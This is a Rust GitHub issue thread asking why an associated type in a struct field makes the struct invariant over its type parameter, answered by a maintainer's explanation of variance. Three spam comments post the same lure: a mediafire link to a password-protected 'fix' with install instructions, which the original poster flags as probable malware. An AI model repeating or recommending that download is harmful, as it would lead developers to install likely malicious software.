### ISSUE TITLE
Why does using associated type cause `'a` to be an invariant

### ISSUE THREAD

**Issue by A4-Tacks** [rust-lang/rust#129644]
```rust
trait Foo { type Ty; }

#[derive(Debug, Clone)]
//struct X<'a, T: Foo>(&'a T);
struct X<'a, T: Foo>(&'a T, T::Ty);
impl<T: Foo> Foo for X<'_, T> {
    type Ty = T::Ty;
}
impl Foo for () {
    type Ty = ();
}

fn f2<'a>(x: X<'a, X<'static, ()>>) -> X<'a, X<'a, ()>> {
    x
}
```

```rust
error: lifetime may not live long enough
  --> src/main.rs:14:5
   |
13 | fn f2<'a>(x: X<'a, X<'static, ()>>) -> X<'a, X<'a, ()>> {
   |       -- lifetime `'a` defined here
14 |     x
   |     ^ returning this value requires that `'a` must outlive `'static`
   |
   = note: requirement occurs because of the type `X<'_, X<'_, ()>>`, which makes the generic argument `X<'_, ()>` inv
ariant
   = note: the struct `X<'a, T>` is invariant over the parameter `T`
   = help: see <https://doc.rust-lang.org/nomicon/subtyping.html> for more information about variance

error: could not compile `test_` (bin "test_") due to 1 previous error
```

**rustc version**:
```
rustc 1.80.0 (051478957 2024-07-21)
binary: rustc
commit-hash: 051478957371ee0084a7c0913941d2a8c4757bb9
commit-date: 2024-07-21
host: aarch64-unknown-linux-gnu
release: 1.80.0
LLVM version: 18.1.7
```

edition 2021

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by A4-Tacks** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

delete it, This may be virus software

**Comment by fmease** [comment]
`T::Ty` forces `X`'s `T` to be invariant because it may evaluate to a (almost) arbitrary types possibly referencing `T` -- and one generally can't make assumptions about the 'concrete variance'. `T::Ty` may evaluate to e.g. `T` in which case it's covariant over `T` (assuming it's `for X<'_, T>`, `T` bare) or to e.g. `fn(T)` in which case it's contravariant over `T` (same assumption), etc.

**Comment by fmease** [comment]
See also https://rust-lang.zulipchat.com/#narrow/stream/144729-t-types/topic/variance.20of.20GATs.20when.20the.20type.20is.20known
